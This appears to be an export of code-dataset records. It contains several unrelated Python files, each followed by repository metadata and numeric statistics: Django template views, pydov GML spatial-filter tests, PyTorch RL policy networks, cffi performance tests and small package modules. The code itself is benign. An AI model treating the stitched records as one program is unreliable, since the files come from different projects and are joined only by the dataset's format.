return render(request, 'Home/plan.html')
def index7(request):
return render(request, 'Home/g1.html')
def index8(request):
return render(request, 'Home/g2.html')
def index9(request):
return render(request, 'Home/g3.html')
def index10(request):
return render(request, 'Home/g4.html')
def index11(request):
return render(request, 'Home/g5.html')
def index12(request):
return render(request, 'Home/g6.html')
def index13(request):
return render(request, 'Home/g7.html')
def index14(request):
return render(request, 'Home/g8.html')
def index15(request):
return render(request, 'Home/g9.html')
def index16(request):
return render(request, 'Home/g10.html')
def index17(request):
return render(request, 'Home/g11.html')
def index18(request):
return render(request, 'Home/g12.html')
def index19(request):
return render(request, 'Home/g13.html')
def index20(request):
return render(request, 'Home/g14.html')
def index21(request):
return render(request, 'Home/g15.html')
def index22(request):
return render(request, 'Home/g16.html')
def index23(request):
return render(request, 'Home/g17.html')
def index24(request):
return render(request, 'Home/g18.html')
| 21.666667 | 60 | 0.7151 | 239 | 1,755 | 5.230126 | 0.292887 | 0.2496 | 0.3648 | 0.4992 | 0.576 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043912 | 0.14359 | 1,755 | 80 | 61 | 21.9375 | 0.787758 | 0.013105 | 0 | 0 | 0 | 0 | 0.193866 | 0.032407 | 0 | 0 | 0 | 0 | 0 | 1 | 0.470588 | false | 0 | 0.039216 | 0.470588 | 0.980392 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
bda889d15771567b147db2ef3d7b89f08651b264 | 18,538 | py | Python | tests/test_util_location.py | GuillaumeVandekerckhove/pydov | b51f77bf93d1f9e96dd39edf564d95426da04126 | [
"MIT"
] | 32 | 2017-03-17T16:36:40.000Z | 2022-02-18T13:10:50.000Z | tests/test_util_location.py | GuillaumeVandekerckhove/pydov | b51f77bf93d1f9e96dd39edf564d95426da04126 | [
"MIT"
] | 240 | 2017-01-03T12:32:15.000Z | 2022-03-30T11:52:02.000Z | tests/test_util_location.py | DOV-Vlaanderen/dov-pydownloader | 126b17f4ad870d9fae5cb2c4b868c564cf7cd1b3 | [
"MIT"
] | 17 | 2017-01-09T21:00:36.000Z | 2022-03-01T15:04:21.000Z | """Module grouping tests for the pydov.util.location module."""
import pytest
from owslib.fes import (
And,
Or,
Not,
)
from pydov.util.location import (
Box,
Point,
Equals,
Disjoint,
Touches,
Within,
Intersects,
WithinDistance,
GmlObject
)
from owslib.etree import etree
from pydov.util.owsutil import set_geometry_column
from tests.abstract import clean_xml
class TestLocation(object):
"""Class grouping tests for the AbstractLocation subtypes."""
def test_box(self):
"""Test the default Box type.
Test whether the generated XML is correct.
"""
box = Box(94720, 186910, 112220, 202870)
xml = box.get_element()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<gml:Envelope srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
'<gml:lowerCorner>94720.000000 186910.000000</gml:lowerCorner>'
'<gml:upperCorner>112220.000000 202870.000000</gml:upperCorner>'
'</gml:Envelope>')
def test_box_wgs84(self):
"""Test the Box type with WGS84 coordinates.
Test whether the generated XML is correct.
"""
box = Box(3.6214, 50.9850, 3.8071, 51.1270, epsg=4326)
xml = box.get_element()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<gml:Envelope srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#4326">'
'<gml:lowerCorner>3.621400 50.985000</gml:lowerCorner>'
'<gml:upperCorner>3.807100 51.127000</gml:upperCorner>'
'</gml:Envelope>')
def test_box_invalid(self):
"""Test the Box type with the wrong ordering of coordinates.
Test whether a ValueError is raised.
"""
with pytest.raises(ValueError):
Box(94720, 202870, 186910, 112220)
def test_box_invalid_wgs84(self):
"""Test the Box type with the wrong ordering of WGS84 coordinates.
Test whether a ValueError is raised.
"""
with pytest.raises(ValueError):
Box(50.9850, 3.6214, 3.8071, 51.1270, epsg=4326)
def test_point(self):
"""Test the default Point type.
Test whether the generated XML is correct.
"""
point = Point(110680, 202030)
xml = point.get_element()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<gml:Point srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
'<gml:pos>110680.000000 202030.000000</gml:pos></gml:Point>')
def test_point_wgs84(self):
"""Test the Point type with WGS84 coordinates.
Test whether the generated XML is correct.
"""
point = Point(3.8071, 51.1270, epsg=4326)
xml = point.get_element()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<gml:Point srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#4326">'
'<gml:pos>3.807100 51.127000</gml:pos></gml:Point>')
def test_gmlobject_element(self):
"""Test the GmlObject type with an etree.Element.
Test whether the returned XML is correct.
"""
with open('tests/data/util/location/polygon_single_31370.gml',
'r') as gmlfile:
gml = gmlfile.read()
gml_element = etree.fromstring(gml.encode('utf8'))
gml_element = gml_element.find(
'.//{http://www.opengis.net/gml}Polygon')
gml_object = GmlObject(gml_element)
assert clean_xml(etree.tostring(
gml_object.get_element()).decode('utf8')) == clean_xml(
'<gml:Polygon '
'srsName="urn:ogc:def:crs:EPSG::31370"><gml:exterior><gml'
':LinearRing><gml:posList>108636.150020818 194960.844295764 '
'108911.922161617 194291.111953824 109195.573506438 '
'195118.42837622 108636.150020818 '
'194960.844295764</gml:posList></gml:LinearRing></gml'
':exterior></gml:Polygon>')
def test_gmlobject_bytes(self):
"""Test the GmlObject type with a GML string.
Test whether the returned XML is correct.
"""
with open('tests/data/util/location/polygon_single_31370.gml',
'r') as gmlfile:
gml = gmlfile.read()
gml_element = etree.fromstring(gml.encode('utf8'))
gml_element = gml_element.find(
'.//{http://www.opengis.net/gml}Polygon')
gml_object = GmlObject(etree.tostring(gml_element))
assert clean_xml(etree.tostring(
gml_object.get_element()).decode('utf8')) == clean_xml(
'<gml:Polygon '
'srsName="urn:ogc:def:crs:EPSG::31370"><gml:exterior><gml'
':LinearRing><gml:posList>108636.150020818 194960.844295764 '
'108911.922161617 194291.111953824 109195.573506438 '
'195118.42837622 108636.150020818 '
'194960.844295764</gml:posList></gml:LinearRing></gml'
':exterior></gml:Polygon>')
def test_gmlobject_string(self):
"""Test the GmlObject type with a GML string.
Test whether the returned XML is correct.
"""
with open('tests/data/util/location/polygon_single_31370.gml',
'r') as gmlfile:
gml = gmlfile.read()
gml_element = etree.fromstring(gml.encode('utf8'))
gml_element = gml_element.find(
'.//{http://www.opengis.net/gml}Polygon')
gml_object = GmlObject(etree.tostring(gml_element).decode('utf8'))
assert clean_xml(etree.tostring(
gml_object.get_element()).decode('utf8')) == clean_xml(
'<gml:Polygon '
'srsName="urn:ogc:def:crs:EPSG::31370"><gml:exterior><gml'
':LinearRing><gml:posList>108636.150020818 194960.844295764 '
'108911.922161617 194291.111953824 109195.573506438 '
'195118.42837622 108636.150020818 '
'194960.844295764</gml:posList></gml:LinearRing></gml'
':exterior></gml:Polygon>')
class TestBinarySpatialFilters(object):
"""Class grouping tests for the AbstractBinarySpatialFilter subtypes."""
def test_equals_point(self):
"""Test the Equals spatial filter with a Point location.
Test whether the generated XML is correct.
"""
equals = Equals(Point(150000, 150000))
equals.set_geometry_column('geom')
xml = equals.toXML()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<ogc:Equals><ogc:PropertyName>geom</ogc:PropertyName>'
'<gml:Point srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
'<gml:pos>150000.000000 150000.000000</gml:pos></gml:Point>'
'</ogc:Equals>')
def test_equals_nogeom(self):
"""Test the Equals spatial filter without setting a geometry column.
Test whether a RuntimeError is raised.
"""
equals = Equals(Point(150000, 150000))
with pytest.raises(RuntimeError):
equals.toXML()
def test_disjoint_box(self):
"""Test the Disjoint spatial filter with a Box location.
Test whether the generated XML is correct.
"""
disjoint = Disjoint(Box(94720, 186910, 112220, 202870))
disjoint.set_geometry_column('geom')
xml = disjoint.toXML()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<ogc:Disjoint><ogc:PropertyName>geom</ogc:PropertyName>'
'<gml:Envelope srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
'<gml:lowerCorner>94720.000000 186910.000000</gml:lowerCorner>'
'<gml:upperCorner>112220.000000 202870.000000</gml:upperCorner>'
'</gml:Envelope></ogc:Disjoint>')
def test_disjoint_nogeom(self):
"""Test the Disjoint spatial filter without setting a geometry column.
Test whether a RuntimeError is raised.
"""
disjoint = Disjoint(Point(150000, 150000))
with pytest.raises(RuntimeError):
disjoint.toXML()
def test_touches_box(self):
"""Test the Touches spatial filter with a Box location.
Test whether the generated XML is correct.
"""
touches = Touches(Box(94720, 186910, 112220, 202870))
touches.set_geometry_column('geom')
xml = touches.toXML()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<ogc:Touches><ogc:PropertyName>geom</ogc:PropertyName>'
'<gml:Envelope srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
'<gml:lowerCorner>94720.000000 186910.000000</gml:lowerCorner>'
'<gml:upperCorner>112220.000000 202870.000000</gml:upperCorner>'
'</gml:Envelope></ogc:Touches>')
def test_touches_nogeom(self):
"""Test the Touches spatial filter without setting a geometry column.
Test whether a RuntimeError is raised.
"""
touches = Touches(Point(150000, 150000))
with pytest.raises(RuntimeError):
touches.toXML()
def test_within_box(self):
"""Test the Within spatial filter with a Box location.
Test whether the generated XML is correct.
"""
within = Within(Box(94720, 186910, 112220, 202870))
within.set_geometry_column('geom')
xml = within.toXML()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<ogc:Within><ogc:PropertyName>geom</ogc:PropertyName>'
'<gml:Envelope srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
'<gml:lowerCorner>94720.000000 186910.000000</gml:lowerCorner>'
'<gml:upperCorner>112220.000000 202870.000000</gml:upperCorner>'
'</gml:Envelope></ogc:Within>')
def test_within_nogeom(self):
"""Test the Within spatial filter without setting a geometry column.
Test whether a RuntimeError is raised.
"""
within = Within(Box(94720, 186910, 112220, 202870))
with pytest.raises(RuntimeError):
within.toXML()
def test_intersects_box(self):
"""Test the Intersects spatial filter with a Box location.
Test whether the generated XML is correct.
"""
intersects = Intersects(Box(94720, 186910, 112220, 202870))
intersects.set_geometry_column('geom')
xml = intersects.toXML()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<ogc:Intersects><ogc:PropertyName>geom</ogc:PropertyName>'
'<gml:Envelope srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
'<gml:lowerCorner>94720.000000 186910.000000</gml:lowerCorner>'
'<gml:upperCorner>112220.000000 202870.000000</gml:upperCorner>'
'</gml:Envelope></ogc:Intersects>')
def test_intersects_nogeom(self):
"""Test the Intersects spatial filter without setting a geometry
column.
Test whether a RuntimeError is raised.
"""
intersects = Intersects(Box(94720, 186910, 112220, 202870))
with pytest.raises(RuntimeError):
intersects.toXML()
class TestLocationFilters(object):
"""Class grouping tests for the AbstractLocationFilter subtypes."""
def test_withindistance_point(self):
"""Test the WithinDistance spatial filter with a Point location.
Test whether the generated XML is correct.
"""
withindistance = WithinDistance(Point(150000, 150000), 100)
withindistance.set_geometry_column('geom')
xml = withindistance.toXML()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<ogc:DWithin><ogc:PropertyName>geom</ogc:PropertyName>'
'<gml:Point srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
'<gml:pos>150000.000000 150000.000000</gml:pos></gml:Point>'
'<gml:Distance units="meter">100.000000</gml:Distance>'
'</ogc:DWithin>')
def test_withindistance_point_named_args(self):
"""Test the WithinDistance spatial filter with a Point location.
Test whether the generated XML is correct.
"""
withindistance = WithinDistance(location=Point(150000, 150000),
distance=100, distance_unit='meter')
withindistance.set_geometry_column('geom')
xml = withindistance.toXML()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<ogc:DWithin><ogc:PropertyName>geom</ogc:PropertyName>'
'<gml:Point srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
'<gml:pos>150000.000000 150000.000000</gml:pos></gml:Point>'
'<gml:Distance units="meter">100.000000</gml:Distance>'
'</ogc:DWithin>')
def test_withindistance_nogeom(self):
"""Test the WithinDistance spatial filter without setting a geometry
column.
Test whether a RuntimeError is raised.
"""
withindistance = WithinDistance(Point(150000, 150000), 100)
with pytest.raises(RuntimeError):
withindistance.toXML()
def test_withindistance_point_wgs84(self):
"""Test the WithinDistance spatial filter with a Point location
using WGS84 coordinates.
Test whether the generated XML is correct.
"""
withindistance = WithinDistance(Point(51.1270, 3.8071, epsg=4326), 100)
withindistance.set_geometry_column('geom')
xml = withindistance.toXML()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<ogc:DWithin><ogc:PropertyName>geom</ogc:PropertyName>'
'<gml:Point srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#4326">'
'<gml:pos>51.127000 3.807100</gml:pos></gml:Point>'
'<gml:Distance units="meter">100.000000</gml:Distance>'
'</ogc:DWithin>')
class TestLocationFilterExpressions(object):
"""Class grouping tests for expressions with spatial filters."""
def test_point_and_box(self):
"""Test a location filter expression using a Within(Box) and a
WithinDistance(Point) filter.
Test whether the generated XML is correct.
"""
point_and_box = And([WithinDistance(Point(150000, 150000), 100),
Within(Box(94720, 186910, 112220, 202870))])
xml = set_geometry_column(point_and_box, 'geom')
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<ogc:And><ogc:DWithin><ogc:PropertyName>geom</ogc:PropertyName'
'><gml:Point srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370"><gml'
':pos>150000.000000 '
'150000.000000</gml:pos></gml:Point><gml:Distance '
'units="meter">100.000000</gml:Distance></ogc:DWithin><ogc'
':Within><ogc:PropertyName>geom</ogc:PropertyName><gml'
':Envelope srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370"><gml'
':lowerCorner>94720.000000 '
'186910.000000</gml:lowerCorner><gml:upperCorner>112220.000000 '
'202870.000000</gml:upperCorner></gml:Envelope></ogc:Within'
'></ogc:And>')
def test_box_or_box(self):
"""Test a location filter expression using an Intersects(Box) and a
Within(Box) filter.
Test whether the generated XML is correct.
"""
box_or_box = Or([
Intersects(Box(50.9850, 3.6214, 51.1270, 3.8071, epsg=4326)),
Within(Box(94720, 186910, 112220, 202870))])
xml = set_geometry_column(box_or_box, 'geom')
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<ogc:Or><ogc:Intersects><ogc:PropertyName>geom</ogc'
':PropertyName><gml:Envelope srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#4326"><gml'
':lowerCorner>50.985000 '
'3.621400</gml:lowerCorner><gml:upperCorner>51.127000 '
'3.807100</gml:upperCorner></gml:Envelope></ogc:Intersects><ogc'
':Within><ogc:PropertyName>geom</ogc:PropertyName><gml:Envelope '
'srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370"><gml '
':lowerCorner>94720.000000 '
'186910.000000</gml:lowerCorner><gml:upperCorner>112220.000000 '
'202870.000000</gml:upperCorner></gml:Envelope></ogc:Within'
'></ogc:Or>')
def test_recursive(self):
"""Test a location filter expression using a recursive expression
with And(Not(WithinDistance(Point) filter.
Test whether the generated XML is correct.
"""
point_and_box = And([Not([WithinDistance(Point(150000, 150000), 100)]),
Within(Box(94720, 186910, 112220, 202870))])
xml = set_geometry_column(point_and_box, 'geom')
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<ogc:And><ogc:Not><ogc:DWithin><ogc:PropertyName>geom</ogc'
':PropertyName><gml:Point srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370"><gml'
':pos>150000.000000 '
'150000.000000</gml:pos></gml:Point><gml:Distance '
'units="meter">100.000000</gml:Distance></ogc:DWithin></ogc:Not'
'><ogc:Within><ogc:PropertyName>geom</ogc:PropertyName><gml'
':Envelope srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370"><gml'
':lowerCorner>94720.000000 '
'186910.000000</gml:lowerCorner><gml:upperCorner>112220.000000 '
'202870.000000</gml:upperCorner></gml:Envelope></ogc:Within'
'></ogc:And>')
| 38.065708 | 79 | 0.609397 | 2,111 | 18,538 | 5.275699 | 0.07532 | 0.026578 | 0.022717 | 0.032055 | 0.860196 | 0.827691 | 0.777678 | 0.745533 | 0.729909 | 0.709617 | 0 | 0.122107 | 0.2565 | 18,538 | 486 | 80 | 38.144033 | 0.685917 | 0.160427 | 0 | 0.575 | 0 | 0.021429 | 0.395582 | 0.235831 | 0 | 0 | 0 | 0 | 0.064286 | 1 | 0.092857 | false | 0 | 0.021429 | 0 | 0.128571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
da3ad44f1d9a36cde1f445b02645bdab5ab8c2c0 | 3,331 | py | Python | common/policies.py | r-salas/minimal-rl | bd07c51fd76f8a2f908454d2f11b627d8efb1ff1 | [
"MIT"
] | null | null | null | common/policies.py | r-salas/minimal-rl | bd07c51fd76f8a2f908454d2f11b627d8efb1ff1 | [
"MIT"
] | null | null | null | common/policies.py | r-salas/minimal-rl | bd07c51fd76f8a2f908454d2f11b627d8efb1ff1 | [
"MIT"
] | null | null | null | #
#
#
# Policies
#
#
import torch
import gym.spaces
import torch.nn as nn
class QNetworkDiscretePolicy(nn.Module):
def __init__(self, observation_space: gym.spaces.Box, action_space: gym.spaces.Discrete):
super().__init__()
self.fc = nn.Sequential(
nn.Linear(observation_space.shape[0], 64),
nn.ReLU(),
nn.Linear(64, 64),
nn.ReLU(),
nn.Linear(64, action_space.n)
)
def forward(self, obs):
return self.fc(obs)
class ActorCriticDiscretePolicy(nn.Module):
def __init__(self, observation_space: gym.spaces.Box, action_space: gym.spaces.Discrete):
super().__init__()
self.common = nn.Sequential(
nn.Linear(observation_space.shape[0], 64),
nn.ReLU(),
nn.Linear(64, 64),
nn.ReLU(),
)
self.actor = nn.Linear(64, action_space.n)
self.critic = nn.Linear(64, 1)
def forward(self, obs):
x = self.common(obs)
return self.critic(x), self.actor(x)
class ActorDiscretePolicy(nn.Module):
def __init__(self, observation_space: gym.spaces.Box, action_space: gym.spaces.Discrete):
super().__init__()
self.fc = nn.Sequential(
nn.Linear(observation_space.shape[0], 64),
nn.ReLU(),
nn.Linear(64, 64),
nn.ReLU(),
nn.Linear(64, action_space.n) # logits
)
def forward(self, obs):
x = self.fc(obs)
return x
class ActorContinousPolicy(nn.Module):
def __init__(self, observation_space: gym.spaces.Box, action_space: gym.spaces.Box):
super().__init__()
self.fc = nn.Sequential(
nn.Linear(observation_space.shape[0], 64),
nn.ReLU(),
nn.Linear(64, 64),
nn.ReLU(),
nn.Linear(64, action_space.shape[0]),
)
def forward(self, obs):
x = self.fc(obs)
x = torch.tanh(x)
return x
class CriticDiscretePolicy(nn.Module):
def __init__(self, observation_space: gym.spaces.Box, action_space: gym.spaces.Discrete):
super().__init__()
self.fc = nn.Sequential(
nn.Linear(observation_space.shape[0] + action_space.shape[0], 64),
nn.ReLU(),
nn.Linear(64, 64),
nn.ReLU(),
nn.Linear(64, action_space.n) # logits
)
def forward(self, obs, action):
if obs.ndim < 2:
obs = obs.unsqueeze(-1)
if action.ndim < 2:
action = action.unsqueeze(-1)
x = torch.cat([obs, action], 1)
x = self.fc(x)
return x
class CriticContinousPolicy(nn.Module):
def __init__(self, observation_space: gym.spaces.Box, action_space: gym.spaces.Box):
super().__init__()
self.fc = nn.Sequential(
nn.Linear(observation_space.shape[0] + action_space.shape[0], 64),
nn.ReLU(),
nn.Linear(64, 64),
nn.ReLU(),
nn.Linear(64, 1),
)
def forward(self, obs: torch.Tensor, action: torch.Tensor):
if obs.ndim < 2:
obs = obs.unsqueeze(-1)
if action.ndim < 2:
action = action.unsqueeze(-1)
x = torch.cat([obs, action], 1)
x = self.fc(x)
return x
| 25.045113 | 93 | 0.555989 | 409 | 3,331 | 4.349633 | 0.117359 | 0.085441 | 0.073075 | 0.061832 | 0.794266 | 0.794266 | 0.779089 | 0.779089 | 0.732434 | 0.732434 | 0 | 0.030883 | 0.309817 | 3,331 | 132 | 94 | 25.234848 | 0.742932 | 0.006605 | 0 | 0.717391 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0 | 0.032609 | 0.01087 | 0.293478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
da47aa694b982f4ffb78e38a155ad91581f1d4ba | 38 | py | Python | os_v4_hek/defs/shpp.py | holy-crust/reclaimer | 0aa693da3866ce7999c68d5f71f31a9c932cdb2c | [
"MIT"
] | null | null | null | os_v4_hek/defs/shpp.py | holy-crust/reclaimer | 0aa693da3866ce7999c68d5f71f31a9c932cdb2c | [
"MIT"
] | null | null | null | os_v4_hek/defs/shpp.py | holy-crust/reclaimer | 0aa693da3866ce7999c68d5f71f31a9c932cdb2c | [
"MIT"
] | null | null | null | from ...os_v3_hek.defs.shpp import *
| 19 | 37 | 0.710526 | 7 | 38 | 3.571429 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030303 | 0.131579 | 38 | 1 | 38 | 38 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e51acb3bff1c06fbd2eb0fe66f54762845916a25 | 29 | py | Python | graphical_models/classes/interventions/__init__.py | vishalbelsare/graphical_models | 15078b3a8ac0af7198150b06359d6c701faa26c3 | [
"BSD-3-Clause"
] | 2 | 2021-09-12T13:41:12.000Z | 2021-11-10T12:22:03.000Z | graphical_models/classes/interventions/__init__.py | vishalbelsare/graphical_models | 15078b3a8ac0af7198150b06359d6c701faa26c3 | [
"BSD-3-Clause"
] | null | null | null | graphical_models/classes/interventions/__init__.py | vishalbelsare/graphical_models | 15078b3a8ac0af7198150b06359d6c701faa26c3 | [
"BSD-3-Clause"
] | 1 | 2021-09-12T13:41:16.000Z | 2021-09-12T13:41:16.000Z | from .interventions import *
| 14.5 | 28 | 0.793103 | 3 | 29 | 7.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e58232d64a1cae9bbc847a4178bb835fcbede84e | 1,867 | py | Python | extra_tests/cffi_tests/embedding/test_performance.py | nanjekyejoannah/pypy | e80079fe13c29eda7b2a6b4cd4557051f975a2d9 | [
"Apache-2.0",
"OpenSSL"
] | 333 | 2015-08-08T18:03:38.000Z | 2022-03-22T18:13:12.000Z | extra_tests/cffi_tests/embedding/test_performance.py | nanjekyejoannah/pypy | e80079fe13c29eda7b2a6b4cd4557051f975a2d9 | [
"Apache-2.0",
"OpenSSL"
] | 7 | 2020-02-16T16:49:05.000Z | 2021-11-26T09:00:56.000Z | extra_tests/cffi_tests/embedding/test_performance.py | nanjekyejoannah/pypy | e80079fe13c29eda7b2a6b4cd4557051f975a2d9 | [
"Apache-2.0",
"OpenSSL"
] | 55 | 2015-08-16T02:41:30.000Z | 2022-03-20T20:33:35.000Z | # Generated by pypy/tool/import_cffi.py
import sys
from extra_tests.cffi_tests.embedding.test_basic import EmbeddingTests
if sys.platform == 'win32':
import pytest
pytestmark = pytest.mark.skip("written with POSIX functions")
class TestPerformance(EmbeddingTests):
def test_perf_single_threaded(self):
perf_cffi = self.prepare_module('perf')
self.compile('perf-test', [perf_cffi], opt=True)
output = self.execute('perf-test')
print('='*79)
print(output.rstrip())
print('='*79)
def test_perf_in_1_thread(self):
perf_cffi = self.prepare_module('perf')
self.compile('perf-test', [perf_cffi], opt=True, threads=True,
defines={'PTEST_USE_THREAD': '1'})
output = self.execute('perf-test')
print('='*79)
print(output.rstrip())
print('='*79)
def test_perf_in_2_threads(self):
perf_cffi = self.prepare_module('perf')
self.compile('perf-test', [perf_cffi], opt=True, threads=True,
defines={'PTEST_USE_THREAD': '2'})
output = self.execute('perf-test')
print('='*79)
print(output.rstrip())
print('='*79)
def test_perf_in_4_threads(self):
perf_cffi = self.prepare_module('perf')
self.compile('perf-test', [perf_cffi], opt=True, threads=True,
defines={'PTEST_USE_THREAD': '4'})
output = self.execute('perf-test')
print('='*79)
print(output.rstrip())
print('='*79)
def test_perf_in_8_threads(self):
perf_cffi = self.prepare_module('perf')
self.compile('perf-test', [perf_cffi], opt=True, threads=True,
defines={'PTEST_USE_THREAD': '8'})
output = self.execute('perf-test')
print('='*79)
print(output.rstrip())
print('='*79)
| 34.574074 | 70 | 0.597215 | 228 | 1,867 | 4.688596 | 0.232456 | 0.074836 | 0.05145 | 0.074836 | 0.76333 | 0.76333 | 0.76333 | 0.76333 | 0.76333 | 0.76333 | 0 | 0.021398 | 0.249063 | 1,867 | 53 | 71 | 35.226415 | 0.741084 | 0.019818 | 0 | 0.644444 | 1 | 0 | 0.120897 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.066667 | 0 | 0.2 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
008e2e1c1419b881bbb4bce8d5ba7adc21e56896 | 154 | py | Python | entmoot/__init__.py | cornelius-braun/entmoot | 47a3c2ffd799dd05a0f5d896e665f17d77688e39 | [
"BSD-3-Clause"
] | 27 | 2020-08-31T13:30:14.000Z | 2022-03-21T11:35:05.000Z | entmoot/__init__.py | cornelius-braun/entmoot | 47a3c2ffd799dd05a0f5d896e665f17d77688e39 | [
"BSD-3-Clause"
] | 2 | 2021-02-16T11:27:53.000Z | 2021-04-20T19:50:53.000Z | entmoot/__init__.py | cornelius-braun/entmoot | 47a3c2ffd799dd05a0f5d896e665f17d77688e39 | [
"BSD-3-Clause"
] | 6 | 2020-10-22T11:45:43.000Z | 2022-03-28T17:42:53.000Z | from .optimizer import Optimizer
from .optimizer import entmoot_minimize
from .space import Space
from .benchmarks import *
__all__ = (
"Optimizer"
) | 19.25 | 39 | 0.772727 | 18 | 154 | 6.333333 | 0.444444 | 0.22807 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162338 | 154 | 8 | 40 | 19.25 | 0.883721 | 0 | 0 | 0 | 0 | 0 | 0.058065 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.571429 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
008fbb23f32fd52ddfa380e74549747341a459b7 | 223 | py | Python | files/test_app/artifactory/artifactory.py | jpnewman/jpnewman_ansible_elk | 47ffec74f7ec6f62a2a71c17bf6940e42b0e2467 | [
"MIT"
] | 1 | 2017-02-04T22:09:25.000Z | 2017-02-04T22:09:25.000Z | files/test_app/artifactory/artifactory.py | jpnewman/jpnewman_ansible_elk | 47ffec74f7ec6f62a2a71c17bf6940e42b0e2467 | [
"MIT"
] | null | null | null | files/test_app/artifactory/artifactory.py | jpnewman/jpnewman_ansible_elk | 47ffec74f7ec6f62a2a71c17bf6940e42b0e2467 | [
"MIT"
] | null | null | null |
from .nuget_package import NugetPackages
class Artifactory(object):
def __init__(self):
self.nuget_package_obj = NugetPackages()
def create_all_packages(self):
self.nuget_package_obj.create_all()
